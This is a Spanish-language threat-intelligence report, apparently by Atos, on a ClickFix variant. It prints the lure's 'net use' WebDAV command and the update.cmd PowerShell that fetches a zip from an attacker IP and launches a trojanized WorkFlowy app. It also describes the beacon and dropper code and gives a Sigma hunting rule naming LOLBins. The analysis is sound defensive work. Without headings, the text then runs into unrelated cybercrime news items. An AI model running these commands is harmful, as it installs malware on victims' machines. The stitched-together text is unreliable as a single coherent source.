Descargo de responsabilidad: Este informe ha sido elaborado por el Centro de Investigación de Amenazas para mejorar la concienciación sobre la ciberseguridad y apoyar el fortalecimiento de las capacidades de defensa. Se basa en investigaciones y observaciones independientes del panorama de amenazas actual disponibles en el momento de la publicación. El contenido está destinado únicamente a fines informativos y de preparación.

Lea más blogs sobre inteligencia de amenazas e investigación de adversarios: https://atos.net/es/lp/cybershield

Resumen

Los investigadores de Atos identificaron una nueva variante de la popular técnica ClickFix, donde los atacantes convencen al usuario para que ejecute un comando malicioso en su propio dispositivo a través del acceso directo Win + R. En esta variación, se utiliza un comando «net use» para asignar una unidad de red desde un servidor externo, después de lo cual se ejecuta un archivo por lotes «.cmd» alojado en esa unidad. El script descarga un archivo ZIP, lo descomprime y ejecuta la aplicación WorkFlowy legítima con una lógica maliciosa modificada oculta dentro del archivo «.asar». Esto actúa como una baliza C2 y un gotero para la carga útil final del malware.

Figura 1: descripción general de alto nivel del flujo de ataques.

Descripción general del ataque

En esta versión, el vector de ataque inicial es el mismo que en todas las demás, una página web que se hace pasar por un mecanismo captcha – “happyglamper[.]ro». Solicita al usuario que abra la aplicación Ejecutar mediante «Win+R», seguido de «Ctrl+V» y «Enter».

Figura 2: Sitio web de phishing 1

Figura 3: Sitio web de phishing 2

Esto ejecuta el siguiente comando:

“cmd.exe” /c net use Z: https://94.156.170[.]255/webdav /persistent:no && “Z:\update.cmd” & net use Z: /delete

Normalmente, en esta etapa, los atacantes han utilizado PowerShell o mshta para descargar y ejecutar la siguiente etapa del malware. Aquí, en cambio, podemos ver que el «uso de red» se utiliza para asignar y conectarse a una unidad de red de un servidor externo desde el cual se ejecuta un script por lotes. Si bien no son novedosos, estos TTP nunca antes se habían visto en ataques ClickFix. Combinada con las siguientes etapas poco comunes de patrones de infección, esta campaña brinda a los adversarios altas posibilidades de evadir los controles defensivos y permanecer fuera del radar de los defensores.

En este caso, la variante ClickFix observada del flujo de ejecución evitó con éxito la detección de Microsoft Defender para Endpoint. Los equipos de seguridad de Atos pudieron detectarlo solo gracias al servicio interno Threat Hunting, que se centró en el principal aspecto de comportamiento de la técnica ClickFix: la ejecución inicial a través de la clave de registro RunMRU (consulta de caza disponible en la sección Apéndice).

El script de ejecución inicial “update.cmd” se carga desde la unidad asignada y se ejecuta; después de eso, se elimina la unidad asignada. Contenido de “update.cmd”:

start "" /min powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://94.156.170[.]255/flowy.zip' -OutFile \"$env:TEMP\dl.zip\";
Expand-Archive \"$env:TEMP\dl.zip\" -DestinationPath \"$env:LOCALAPPDATA\MyApp\" -Force;
Start-Process \"$env:LOCALAPPDATA\MyApp\WorkFlowy.exe\""

Esto genera una instancia de PowerShell que descarga un archivo zip y lo extrae en el directorio “%LOCALAPPDATA%\MyApp\”. Luego ejecuta el binario “WorkFlowy.exe”.

Figura 4: Contenido del archivo flowy.zip

Análisis de flujo de trabajo

El archivo contiene una aplicación de escritorio WorkFlowy (versión 1.4.1050), firmada por el desarrollador “FunRoutine Inc.”, distribuida como un paquete de aplicaciones Electron. Las aplicaciones de Electron se escriben utilizando tecnologías web populares (HTML, CSS y JavaScript) y utilizan archivos «.asar» para empaquetar el código fuente durante el empaquetado de la aplicación. Se hace por varias razones, como mitigar problemas relacionados con nombres de rutas largos en Windows. El código malicioso se inyectó en main.js, el punto de entrada de Node.js de la aplicación, oculto dentro del archivo app.asar.

Perfil Técnico

Vector de infección

El archivo malicioso ASAR es un reemplazo directo del legítimo resources/app.asar. El atacante volvió a empaquetar una versión anterior de la aplicación (v1.4 frente a la v4.3 actual) con código inyectado.

Figura 5: Contenido del subdirectorio «recursos»

Código malicioso (gotero/baliza)

Cuando se ejecuta WorkFlowy, busca el archivo app.asar en la ruta relativa codificada en el binario. Luego lee el archivo main.js desde su interior, lo decodifica en una cadena y lo analiza en el motor JavaScript V8 de Google integrado, que lo ejecuta. Los atacantes han reemplazado el main.js legítimo por uno que ellos mismos han creado. En lugar de scripts bien estructurados, han utilizado una estructura en línea muy ofuscada, agregando código malicioso encima del legítimo, asegurando que se ejecute primero y bloqueando la funcionalidad WorkFlowy.

El código malicioso contiene varias funciones críticas:

1. El malware se ejecuta antes de que se inicie la aplicación legítima: El IIFE inyectado se abre con await f(), el bucle infinito de baliza C2. Debido a que f() nunca se resuelve, todo el código de inicialización legítimo de WorkFlowy que sigue se bloquea permanentemente. El malware se ejecuta con privilegios completos de Node.js inmediatamente después del lanzamiento.

2. Toma de huellas dactilares persistente de la víctima a través de %APPDATA%\id.txt: En la primera ejecución se genera un ID alfanumérico aleatorio de 8 caracteres y se escribe en %APPDATA%\id.txt. En ejecuciones posteriores, la identificación almacenada se vuelve a leer, lo que le brinda al atacante un identificador estable para cada máquina víctima en todas las sesiones.

3. Baliza C2: extrae la identidad del host cada 2 segundos: La función u() envía una POST HTTP que contiene la identificación única de la víctima, el nombre de la máquina y el nombre de usuario de Windows al servidor C2. El bucle en f() repite esto indefinidamente con un intervalo de 2 segundos.

4. Descarga y ejecución remota de carga útil: La función p() recibe un objeto de tarea del C2, decodifica el contenido del archivo codificado en base64, lo escribe en un directorio con marca de tiempo en %TEMP% y ejecuta cualquier .exe a través de child_process.exec.

Si no se establece la conexión C2, no se generan archivos ni directorios. En el momento de realizar este análisis, el dominio C2 ya no respondía.

Por qué Electron es un mecanismo de entrega eficaz

El código malicioso se ejecuta en el proceso principal de Node.js, fuera del entorno limitado de Chromium, con todos los privilegios del usuario que ha iniciado sesión, lo que permite que el código malicioso ejecute cualquier acción que el usuario pueda realizar en el sistema. En realidad, no se escriben archivos en el disco y, dado que la carga útil maliciosa está empaquetada dentro del archivo «.asar», también ayuda a ocultar el código malicioso.

Persistencia

No se implementa ninguna persistencia a nivel del sistema operativo a través del cuentagotas. La baliza se ejecuta solo mientras WorkFlowy está abierto. El único artefacto escrito en el disco antes de la entrega en la siguiente etapa es %APPDATA%\id.txt (ID de seguimiento de la víctima), y eso solo si la conexión a C2 se establece correctamente. Presumiblemente, se delega una persistencia a nivel del sistema operativo a cualquier carga útil que entregue el C2 a través del cuentagotas.

Lea más blogs sobre inteligencia de amenazas e investigación de adversarios: https://atos.net/es/lp/cybershield

Conclusiones clave

Esta variante de ClickFix es importante porque aleja el acceso inicial de los motores de ejecución y secuencias de comandos de los que comúnmente se abusa, como PowerShell, MSHTA y WScript, y en su lugar depende del uso de la red para abusar de WebDAV como mecanismo de entrega. Las campañas anteriores de ClickFix generalmente se exponían al invocar directamente intérpretes o binarios que viven fuera de la tierra y que están fuertemente monitoreados por soluciones EDR modernas. Por el contrario, esta iteración monta un recurso compartido WebDAV remoto como una unidad local, ejecuta un archivo por lotes alojado mediante la semántica estándar del sistema de archivos y elimina la asignación inmediatamente después de su uso. Esto muestra que ClickFix aún evoluciona, expande su arsenal de métodos de ejecución de proxy y comienza a utilizar utilidades de red nativas.

La lógica maliciosa se oculta reemplazando el contenido del archivo app.asar de la aplicación Workflowy con una versión troyanizada de main.js. Debido a que el código se ejecuta dentro del proceso principal de Electron y permanece empaquetado dentro de una aplicación legítima, evita muchas detecciones de comportamiento y basadas en archivos que se centran en cargadores independientes o intérpretes de scripts. Los archivos ASAR rara vez se inspeccionan, lo que permite que la lógica del dropper se ejecute durante el inicio normal de la aplicación con una visibilidad mínima.

Esta actividad no fue detectada por los controles de seguridad y solo se identificó mediante la búsqueda de amenazas dirigida en Atos. La detección se basó en analizar el contexto de ejecución en lugar de los indicadores de carga útil, específicamente buscando ejecuciones de comandos sospechosas que se originaran en el cuadro de diálogo Ejecutar del Explorador (registrado dentro de la clave de registro RunMRU). Esto subraya la creciente importancia de la caza de amenazas como mecanismo de detección complementario: a medida que las campañas de ClickFix cambian hacia utilidades nativas y aplicaciones confiables que generan pocas alertas, sólo la caza proactiva y basada en hipótesis puede ayudar a sacar a la luz estas señales débiles lo suficientemente temprano como para interrumpir la cadena de ataque.

Apéndices

COI

Consulta de caza

• título: Comandos sospechosos ejecutados mediante el cuadro de diálogo Ejecutar
• identificación: 20891a30-032e-4f15-a282-fa4a8b0d8aae
• estado: experimental
• descripción:
• Detecta intérpretes de comandos sospechosos y LOLBins escritos en la clave de registro Explorer RunMRU (comúnmente utilizada para el historial de diálogo de ejecución), con explorer.exe como proceso de inicio.
• autor: CVR
• fecha: 2026-03-05
• etiquetas:
• – ataque.ejecución
• – ataque.t1059
• – ataque.defense_evasion
• fuente de registro:
• categoría: conjunto_registro
• producto: ventanas
• definición: «ID de evento de Sysmon 13 (conjunto de valores de registro) o telemetría de registro EDR equivalente»
• detección:
• clave_selección:
• TargetObject|contiene: ‘\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU’
• proceso_selección:
• Imagen|termina con: ‘\explorer.exe’
• datos_de_selección:
• Detalles|contiene:
• – ‘cmd’
• – ‘powershell’
• – ‘cmd.exe’
• – ‘powershell.exe’
• – ‘wscript.exe ‘
• – ‘cscript.exe ‘
• – ‘net.exe’
• – ‘net1.exe’
• – ‘sh.exe’
• – ‘bash.exe’
• – ‘schtasks.exe’
• – ‘regsvr32.exe’
• – ‘hh.exe’
• – ‘wmic.exe ‘
• – ‘mshta.exe’
• – ‘rundll32.exe’
• – ‘msiexec.exe ‘
• – ‘forfiles.exe ‘
• – ‘scriptrunner.exe’
• – ‘mftrace.exe ‘
• – ‘AppVLP.exe ‘
• – ‘svchost.exe’
• – ‘msbuild.exe’
• condición: clave_selección y proceso_selección y datos_selección
• falsos positivos:
• – «Actividad administrativa legítima utilizando el cuadro de diálogo Ejecutar (Win+R) para ejecutar herramientas integradas».
• – «Scripts de TI o pasos de solución de problemas ejecutados de forma interactiva por un usuario».
• nivel: medio

Lea más blogs sobre inteligencia de amenazas e investigación de adversarios: https://atos.net/es/lp/cybershield

INTERPOL el viernes anunciado la eliminación de 45.000 direcciones IP y servidores maliciosos utilizados en relación con campañas de phishing, malware y ransomware, como parte de los esfuerzos continuos de la agencia para desmantelar redes criminales, interrumpir amenazas emergentes y proteger a las víctimas de estafas.

El esfuerzo es parte de una operación internacional de aplicación de la ley que involucró a 72 países y territorios. También condujo al arresto de 94 personas, y otras 110 personas aún están bajo investigación. Durante las redadas realizadas en distintos lugares clave se incautaron un total de 212 dispositivos electrónicos y servidores.

En una operación de este tipo en Bangladesh se arrestó a 40 sospechosos y se confiscaron 134 dispositivos electrónicos relacionados con una amplia gama de delitos cibernéticos, incluidas estafas de préstamos y empleos, robo de identidad y fraude con tarjetas de crédito.

En Togo, las autoridades detuvieron a 10 sospechosos acusados ​​de dirigir una red de fraude desde una zona residencial. Si bien algunos participaron en la piratería de cuentas de redes sociales, otros llevaron a cabo esquemas de ingeniería social, incluidas estafas románticas y sextorsión.

Los estafadores, después de obtener acceso no autorizado a la cuenta de una víctima, contactaban a sus contactos en línea, haciéndose pasar por el titular de la cuenta para entablar relaciones románticas falsas y engañar a amigos y familiares. El objetivo final de la estafa era engañar a las víctimas secundarias para que realizaran transferencias de dinero.

Por último, los funcionarios encargados de hacer cumplir la ley de Macao identificaron más de 33.000 sitios web fraudulentos y de phishing relacionados con casinos falsos e infraestructura crítica, como bancos, gobiernos y servicios de pago. Estos sitios web se crearon para defraudar a las víctimas indicándoles que recargaran sus saldos o ingresaran información personal.

La represión del cibercrimen marca la tercera fase de la Operación Synergia, que tuvo lugar entre el 18 de julio de 2025 y el 31 de enero de 2026. Las dos fases anteriores tuvieron lugar en 2023 y 2024, identificando miles de servidores maliciosos y decenas de arrestos.

La CBI de la India se centra en un caso de fraude transnacional

La divulgación se produce cuando la Oficina Central de Investigaciones (CBI) de la India dijo que realizó búsquedas coordinadas en 15 ubicaciones en Delhi, Rajasthan, Uttar Pradesh y Punjab como parte de una inversión en línea organizada a gran escala y un fraude laboral a tiempo parcial que involucra principalmente a una plataforma fintech con sede en Dubai llamada Pyypl.

«Se alegó que miles de ciudadanos indios desprevenidos fueron estafados con millones de rupias a través de esquemas engañosos en línea operados por un sindicato de fraude transnacional organizado», dijo la CBI. dicho.

Se dice que la red criminal aprovechó las plataformas de redes sociales, aplicaciones móviles y servicios de mensajería cifrada para atraer a las víctimas con promesas de altos rendimientos de las inversiones en línea y oportunidades laborales a tiempo parcial.

Como destacó Proofpoint en octubre de 2024, estas estafas tienen como objetivo ganarse la confianza de las víctimas convenciéndolas de depositar pequeñas cantidades y mostrar ganancias ficticias en sitios falsos, tras lo cual se las persuade a invertir mayores sumas de dinero.

Tan pronto como se depositan los fondos, se transfieren rápidamente a través de múltiples cuentas bancarias para cubrir el rastro del dinero y luego se retiran mediante retiros en cajeros automáticos en el extranjero utilizando tarjetas de débito habilitadas para transacciones internacionales y mediante recargas de billetera en plataformas fintech extranjeras como Pyypl utilizando las redes de pago Visa y Mastercard.

Estos retiros, según el CBI, aparecieron como transacciones de punto de venta (PoS) en los sistemas bancarios que pasaron desapercibidas. Parte del dinero robado también se convirtió en criptomonedas y se consolidó en cuentas vinculadas a 15 empresas fantasma y enrutadas a través de dos entidades.

«Estas entidades convirtieron los ingresos en USDT a través de intercambios de activos virtuales con sede en India y transfirieron la criptomoneda a sus billeteras incluidas en la lista blanca», agregó el CBI.

La agencia de investigación criminal ha identificado a Ashok Kumar Sharma y otros cómplices anónimos como miembros clave del sindicato. Sharma ha sido detenido. También dijo que se han congelado varias cuentas bancarias utilizadas por las entidades y se han incautado documentos incriminatorios y pruebas digitales relacionadas con las operaciones diarias del sindicato.

Microsoft ha revelado detalles de una campaña de robo de credenciales que emplea clientes falsos de redes privadas virtuales (VPN) distribuidos mediante técnicas de envenenamiento de optimización de motores de búsqueda (SEO).

«La campaña redirige a los usuarios que buscan software empresarial legítimo a archivos ZIP maliciosos en sitios web controlados por atacantes para implementar troyanos firmados digitalmente que se hacen pasar por clientes VPN confiables mientras recolectan credenciales de VPN», dijeron los equipos de Microsoft Threat Intelligence y Microsoft Defender Experts. dicho.

El fabricante de Windows, que observó la actividad a mediados de enero de 2026, la ha atribuido a Tormenta-2561un grupo de actividad de amenazas conocido por propagar malware mediante envenenamiento de SEO y hacerse pasar por proveedores de software populares desde mayo de 2025.

Las campañas del actor de amenazas fueron documentado por primera vez de Cyjax, destacando el uso de envenenamiento de SEO para redirigir a los usuarios que buscan programas de software de compañías como SonicWall, Hanwha Vision y Pulse Secure (ahora Ivanti Secure Access) en Bing a sitios falsos y engañarlos para que descarguen instaladores MSI que implementan el cargador Bumblebee.

Zscaler reveló una iteración posterior del ataque en octubre de 2025. Se observó que la campaña aprovechaba que los usuarios buscaban software legítimo en Bing para propagar un cliente VPN troyanizado Ivanti Pulse Secure a través de sitios web falsos («ivanti-vpn[.]org») que finalmente robó las credenciales de VPN de la máquina de la víctima.

Microsoft dijo que la actividad destaca cómo los actores de amenazas explotan la confianza en las clasificaciones de los motores de búsqueda y la marca del software como una táctica de ingeniería social para robar datos de los usuarios que buscan software VPN empresarial. Lo que agrava las cosas es el abuso de plataformas confiables como GitHub para alojar los archivos del instalador.

Específicamente, el repositorio de GitHub aloja un archivo ZIP que contiene un archivo de instalación MSI que se hace pasar por software VPN legítimo, pero descarga archivos DLL maliciosos durante la instalación. El objetivo final, como antes, es recopilar y filtrar credenciales de VPN utilizando una variante de un ladrón de información llamado Hyrax.

Se muestra al usuario un cuadro de diálogo de inicio de sesión de VPN falso, pero convincente, para capturar las credenciales. Una vez que la víctima ingresa la información, se le muestra un mensaje de error y se le indica que esta vez descargue el cliente VPN legítimo. En algunos casos, son redirigidos al sitio web legítimo de VPN.

El malware hace uso de la Clave de registro de Windows RunOnce para configurar la persistencia, de modo que se ejecute automáticamente cada vez que se reinicie el sistema.

«Esta campaña exhibe características consistentes con las operaciones de cibercrimen con motivación financiera empleadas por Storm-2561», dijo Microsoft. «Los componentes maliciosos están firmados digitalmente por ‘Taiyuan Lihua Near Information Technology Co., Ltd.’»

Desde entonces, el gigante tecnológico eliminó los repositorios de GitHub controlados por el atacante y revocó el certificado legítimo para neutralizar la operación.

Para contrarrestar tales amenazas, se recomienda a las organizaciones y a los usuarios que implementen la autenticación multifactor (MFA) en todas las cuentas, tengan cuidado al descargar software de sitios web y se aseguren de que sean auténticos.

Los investigadores de ciberseguridad han revelado múltiples vulnerabilidades de seguridad dentro del kernel de Linux. Armadura de aplicaciones módulo que podría ser explotado por usuarios sin privilegios para eludir las protecciones del kernel, escalar a la raíz y socavar las garantías de aislamiento del contenedor.

Las nueve vulnerabilidades confusas de los diputados han recibido un nombre en código colectivo Armadura de grieta por la Unidad de Investigación de Amenazas Qualys (TRU). La empresa de ciberseguridad dijo que el problema existe desde 2017. No se han asignado identificadores CVE a las deficiencias.

AppArmor es un módulo de seguridad de Linux que proporciona control de acceso obligatorio (MAC) y protege el sistema operativo contra amenazas externas o internas al evitar que se exploten fallas conocidas y desconocidas de las aplicaciones. Se ha incluido en el kernel principal de Linux desde la versión 2.6.36.

«Este aviso de ‘CrackArmor’ expone una defecto adjunto confundido permitiendo a usuarios sin privilegios manipular perfiles de seguridad a través de pseudoarchivos, eludir restricciones de espacio de nombres de usuario y ejecutar código arbitrario dentro del kernel», Saeed Abbasi, gerente senior de Qualys TRU, dicho.

«Estas fallas facilitan la escalada de privilegios locales para rootear a través de interacciones complejas con herramientas como Sudo y Postfix, junto con ataques de denegación de servicio a través del agotamiento de la pila y omisiones de Kernel Address Space Layout Randomization (KASLR) a través de lecturas fuera de límites».

Vulnerabilidades confusas del diputado Ocurre cuando un usuario no autorizado obliga a un programa privilegiado a hacer un uso indebido de sus privilegios para realizar acciones maliciosas no deseadas. Básicamente, el problema explota la confianza asociada con una herramienta con más privilegios para ejecutar un comando que conduce a una escalada de privilegios.

Qualys dijo que una entidad que no tiene permisos para realizar una acción puede manipular los perfiles de AppArmor para deshabilitar protecciones de servicios críticos o hacer cumplir políticas de denegación total, desencadenando ataques de denegación de servicio (DoS) en el proceso.

«Combinado con fallas a nivel de kernel inherentes al análisis de perfiles, los atacantes eluden las restricciones del espacio de nombres de usuario y logran una escalada de privilegios locales (LPE) hasta la raíz completa», agregó.

«La manipulación de políticas compromete todo el host, mientras que las omisiones del espacio de nombres facilitan exploits avanzados del kernel, como la divulgación de memoria arbitraria. Las capacidades DoS y LPE resultan en interrupciones del servicio, manipulación de credenciales a través de raíz sin contraseña (por ejemplo, modificación de /etc/passwd) o divulgación de KASLR, lo que permite más cadenas de explotación remota».

Para empeorar las cosas, CrackArmor permite a los usuarios sin privilegios crear espacios de nombres de usuario con todas las capacidades, evitando de manera efectiva los problemas de Ubuntu. restricciones de espacio de nombres de usuario implementado a través de AppArmor, además de subvertir garantías de seguridad críticas como el aislamiento de contenedores, la aplicación de privilegios mínimos y el refuerzo del servicio.

La compañía de ciberseguridad dijo que está reteniendo la publicación de exploits de prueba de concepto (PoC) para las fallas identificadas para darles a los usuarios algo de tiempo para priorizar los parches y minimizar la exposición.

El problema afecta a todos los kernels de Linux desde la versión 4.11 en cualquier distribución que integre AppArmor. Con más de 12,6 millones de instancias empresariales de Linux que funcionan con AppArmor habilitado de forma predeterminada en varias distribuciones importantes, como Ubuntu, Debian y SUSE, se recomienda aplicar parches inmediatos al kernel para mitigar estas vulnerabilidades.

«El parche inmediato del kernel sigue siendo la prioridad no negociable para neutralizar estas vulnerabilidades críticas, ya que la mitigación provisional no ofrece el mismo nivel de garantía de seguridad que restaurar la ruta del código arreglado por el proveedor», señaló Abbasi.

Google lanzó el jueves actualizaciones de seguridad para su navegador web Chrome para abordar dos vulnerabilidades de alta gravedad que, según dijo, han sido explotadas en la naturaleza.

La lista de vulnerabilidades es la siguiente:

• CVE-2026-3909 (Puntuación CVSS: 8,8): una vulnerabilidad de escritura fuera de límites en la biblioteca de gráficos Skia 2D que permite a un atacante remoto realizar acceso a memoria fuera de límites a través de una página HTML diseñada.
• CVE-2026-3910 (Puntuación CVSS: 8,8): una vulnerabilidad de implementación inapropiada en el motor V8 JavaScript y WebAssembly que permite a un atacante remoto ejecutar código arbitrario dentro de un entorno limitado a través de una página HTML diseñada.

Ambas vulnerabilidades fueron descubiertas y reportadas por el propio Google el 10 de marzo de 2026. Como es habitual en estos casos, no hay detalles disponibles sobre cómo se está abusando de los problemas en la naturaleza y quién está detrás de los esfuerzos. Esto se hace para evitar que otros actores de amenazas exploten los problemas.

«Google es consciente de que existen exploits tanto para CVE-2026-3909 como para CVE-2026-3910», dijo la empresa. anotado.

El desarrollo se produce menos de un mes después de que Google enviara correcciones para un error de uso después de la liberación de alta gravedad en el componente CSS de Chrome (CVE-2026-2441, puntuación CVSS: 8.8) que también había sido explotado como un día cero. Google ha parcheado un total de tres días cero de Chrome activamente armados desde principios de año.

Para una protección óptima, se recomienda a los usuarios actualizar su navegador Chrome a las versiones 146.0.7680.75/76 para Windows y Apple macOS, y 146.0.7680.75 para Linux. Para asegurarse de que estén instaladas las últimas actualizaciones, los usuarios pueden navegar a Más > Ayuda > Acerca de Google Chrome y seleccionar Reiniciar.

También se recomienda a los usuarios de otros navegadores basados ​​en Chromium, como Microsoft Edge, Brave, Opera y Vivaldi, que apliquen las correcciones cuando estén disponibles.

Una operación policial internacional autorizada por un tribunal ha desmantelado un servicio de proxy criminal llamado CalcetinesAcompañante que esclavizó a miles de enrutadores residenciales en todo el mundo a una botnet para cometer fraude a gran escala.

«SocksEscort infectó los enrutadores de Internet domésticos y de pequeñas empresas con malware», dijo el Departamento de Justicia de EE. UU. (DoJ) dicho. «El malware permitió a SocksEscort dirigir el tráfico de Internet a través de los enrutadores infectados. SocksEscort vendió este acceso a sus clientes».

CalcetinesEscort («socksescort[.]com») habría ofrecido vender acceso a alrededor de 369.000 direcciones IP diferentes en 163 países desde el verano de 2020, y el servicio enumeraba casi 8.000 enrutadores infectados en febrero de 2026. De estos, 2.500 estaban ubicados en los EE. UU.

En diciembre de 2025, el sitio web de SocksEscort afirmaba ofrecer «IP residenciales estáticas con ancho de banda ilimitado» y que pueden evitar las listas de bloqueo de spam. Anunciaba más de 35.900 proxies de 102 países, y un conjunto de 30 proxies costaba 15 dólares al mes. Un paquete para 5.000 representantes costaba 200 dólares al mes.

El objetivo final de servicios como SocksEscort es permitir a los clientes que pagan canalizar el tráfico de Internet a través de dispositivos comprometidos sin el conocimiento de la víctima, ofreciéndoles una forma de mezclarse y dificultar la diferenciación del tráfico malicioso de la actividad legítima al ocultar sus verdaderas direcciones IP y ubicaciones.

Algunas de las víctimas que fueron defraudadas como parte de esquemas llevados a cabo utilizando SocksEscort incluyeron un cliente de un intercambio de criptomonedas que vivía en Nueva York y fue defraudado con $1 millón en criptomonedas; una empresa manufacturera en Pensilvania que fue defraudada por 700.000 dólares; y miembros actuales y anteriores del servicio estadounidense con tarjetas MILITARY STAR que fueron defraudados por 100.000 dólares.

En un anuncio coordinado, Europol dijo que el esfuerzo, cuyo nombre en código es Operación Relámpago, involucró a autoridades de Austria, Bulgaria, Francia, Alemania, Hungría, los Países Bajos, Rumania y los EE. UU. El ejercicio de interrupción resultó en la eliminación de 34 dominios y 23 servidores ubicados en siete países. Se han congelado un total de 3,5 millones de dólares en criptomonedas.

«Estos dispositivos, principalmente enrutadores residenciales, fueron explotados para facilitar diversas actividades delictivas, incluido ransomware, ataques DDoS y la distribución de material de abuso sexual infantil (CSAM)», Europol dicho. «Los dispositivos comprometidos fueron infectados a través de una vulnerabilidad en los módems residenciales de una marca específica».

«Para acceder al servicio de proxy, los clientes tenían que utilizar una plataforma de pago que permitía comprar el servicio de forma anónima utilizando criptomonedas. Se estima que esta plataforma de pago recibió más de 5 millones de euros de los clientes del servicio de proxy».

SocksEscort funcionaba con un malware conocido como AVrecon, cuyos detalles fueron documentados públicamente por Lumen Black Lotus Labs en julio de 2023. Sin embargo, se estima que está activo desde al menos mayo de 2021. Se estima que el servicio proxy ha victimizado a 280.000 direcciones IP distintas a partir de principios de 2025.

Además de convertir un dispositivo infectado en un proxy residencial de SocksEscort, AVrecon está equipado para establecer un shell remoto para un servidor controlado por un atacante y actuar como un cargador descargando y ejecutando cargas útiles arbitrarias. El malware se dirige a aproximadamente 1200 modelos de dispositivos fabricados por Cisco, D-Link, Hikvision, Mikrotik, Netgear, TP-Link y Zyxel.

«La gran mayoría de los dispositivos observados infectados con el malware AVrecon son enrutadores de pequeñas oficinas/oficinas domésticas (SOHO) infectados mediante vulnerabilidades críticas como la ejecución remota de código (RCE) y la inyección de comandos», dijo la Oficina Federal de Investigaciones de EE. UU. dicho en una alerta. «El malware AVrecon está escrito en lenguaje C y se dirige principalmente a dispositivos MIPS y ARM».

Para lograr persistencia, se ha observado que los actores de amenazas utilizan el mecanismo de actualización incorporado del dispositivo para mostrar una imagen de firmware personalizada que contiene una copia de AVrecon, que está codificada para ejecutarla al iniciar el dispositivo. El firmware modificado también desactiva las funciones de actualización y actualización del dispositivo, lo que provoca que los dispositivos queden infectados permanentemente.

«Esta botnet representaba una amenaza significativa, ya que se comercializaba exclusivamente para delincuentes y estaba compuesta únicamente por dispositivos periféricos comprometidos», dijo el equipo de Black Lotus Labs. dicho. «Durante los últimos años, SocksEscort mantuvo un tamaño promedio de aproximadamente 20.000 víctimas distintas por semana, con comunicaciones enrutadas a través de un promedio de 15 nodos de comando y control (C2)».

Veeam ha lanzado actualizaciones de seguridad para abordar múltiples vulnerabilidades críticas en su software Backup & Replication que, si se explotan con éxito, podrían resultar en la ejecución remota de código.

El vulnerabilidades son los siguientes –

• CVE-2026-21666 (Puntuación CVSS: 9,9): una vulnerabilidad que permite a un usuario de dominio autenticado realizar la ejecución remota de código en Backup Server.
• CVE-2026-21667 (Puntuación CVSS: 9,9): una vulnerabilidad que permite a un usuario de dominio autenticado realizar la ejecución remota de código en Backup Server.
• CVE-2026-21668 (Puntuación CVSS: 8,8): una vulnerabilidad que permite a un usuario de dominio autenticado evitar restricciones y manipular archivos arbitrarios en un repositorio de respaldo.
• CVE-2026-21672 (Puntuación CVSS: 8,8): una vulnerabilidad que permite la escalada de privilegios locales en servidores Veeam Backup & Replication basados ​​en Windows.
• CVE-2026-21708 (Puntuación CVSS: 9,9): una vulnerabilidad que permite que un visor de copia de seguridad realice la ejecución remota de código como usuario de postgres.

Las deficiencias, que afectan a Veeam Backup & Replication 12.3.2.4165 y a todas las versiones anteriores 12, se abordaron en versión 12.3.2.4465. CVE-2026-21672 y CVE-2026-21708 también se han corregido en Copia de seguridad y replicación 13.0.1.2067junto con dos fallos de seguridad más críticos –

• CVE-2026-21669 (Puntuación CVSS: 9,9): una vulnerabilidad que permite a un usuario de dominio autenticado realizar la ejecución remota de código en Backup Server.
• CVE-2026-21671 (Puntuación CVSS: 9.1): una vulnerabilidad que permite a un usuario autenticado con la función de administrador de respaldo realizar la ejecución remota de código en implementaciones de alta disponibilidad (HA) de Veeam Backup & Replication.

«Es importante tener en cuenta que una vez que se revela una vulnerabilidad y su parche asociado, los atacantes probablemente intentarán aplicar ingeniería inversa al parche para explotar implementaciones sin parches del software Veeam», dijo la compañía en su aviso.

Dado que las vulnerabilidades en el software Veeam han sido explotadas repetidamente por actores de amenazas para llevar a cabo ataques de ransomware en el pasado, es esencial que los usuarios actualicen sus instancias a la última versión para protegerse contra cualquier amenaza potencial.

Un ciberataque que afirmó un grupo de hackers iraní se llevó a cabo contra el fabricante de dispositivos médicos Stryker podría marcar la primera acción cibernética significativa de Teherán desde el inicio del conflicto conjunto entre Estados Unidos e Israel.

Pero incluso eso puede haber sido un feliz accidente para los piratas informáticos iraníes en lo que ha sido un bajo nivel de actividad durante ese período de tiempo, con los atacantes obteniendo ganancias por casualidad y no a propósito.

Las empresas de ciberseguridad, los rastreadores de inteligencia de amenazas y los propietarios de infraestructuras críticas han estado luchando para separar el ruido sobre los ataques proclamados desde Irán y las advertencias y amenazas relacionadas con el conflicto, de lo que realmente está sucediendo y representa un peligro significativo.

“Todo el mundo está luchando en este momento”, dijo Alex Orleans, analista de amenazas de Irán desde hace mucho tiempo y jefe de inteligencia de amenazas de Sublime Security. Otros dijeron que la naturaleza incipiente del conflicto dificulta las evaluaciones.

«Lo que vemos es bastante difícil de cuantificar o caracterizar sobre si ha habido un aumento o una disminución», dijo Saher Naumaan, investigador senior de amenazas en Proofpoint. «Creo que como solo llevamos un par de semanas en el conflicto y la cadencia regular de los actores iraníes no es muy consistente, necesariamente no tenemos suficientes datos ni suficiente tiempo para juzgar realmente».

Signos de actividad

En los primeros días del conflicto, hubo indicios de que ataques fisicos sobre Irán podría haber obstaculizado los esfuerzos de represalia iraníes u otras actividades cibernéticas, ya que aquellos que llevarían a cabo ataques cibernéticos probablemente estaban «escondidos en búnkeres», dijo Orleans, y como Irán sufrió cortes de internet.

Sin embargo, en los últimos días, el ataque Stryker y otros indicadores sugieren que la actividad cibernética iraní podría estar calentándose.

«Durante varios días después del estallido del conflicto, se notó una disminución en la actividad de amenazas cibernéticas provenientes de Irán», dijo un grupo de centros de análisis e intercambio de información de la industria. advirtió el miércoles. «Sin embargo, hay señales de vida en las operaciones cibernéticas ofensivas iraníes».

El ataque de Stryker destaca tanto por el tamaño como por la ubicación del objetivo, un fabricante de dispositivos médicos con sede en Michigan con más de 25 mil millones de dólares en ingresos en 2025.

Pero tanto Orleans como Sergey Shykevich, gerente del grupo de inteligencia de amenazas en Check Point Research, dijeron que el ataque tiene las características de ser oportunista en lugar de uno deliberado y enfocado. El grupo que se atribuye el mérito del ataque, Handala, un equipo vinculado al Ministerio de Inteligencia, es más conocido por aprovechar las debilidades que encuentra en lugar de hacerlo. persiguiendo obstinadamente objetivos particulares.

En particular, Stryker también es la clase de vehículo militar utilizado por las fuerzas estadounidenses. Esa conexión militar, incluso si se confunde con el fabricante de dispositivos médicos, posiblemente podría explicar por qué la empresa era un objetivo.

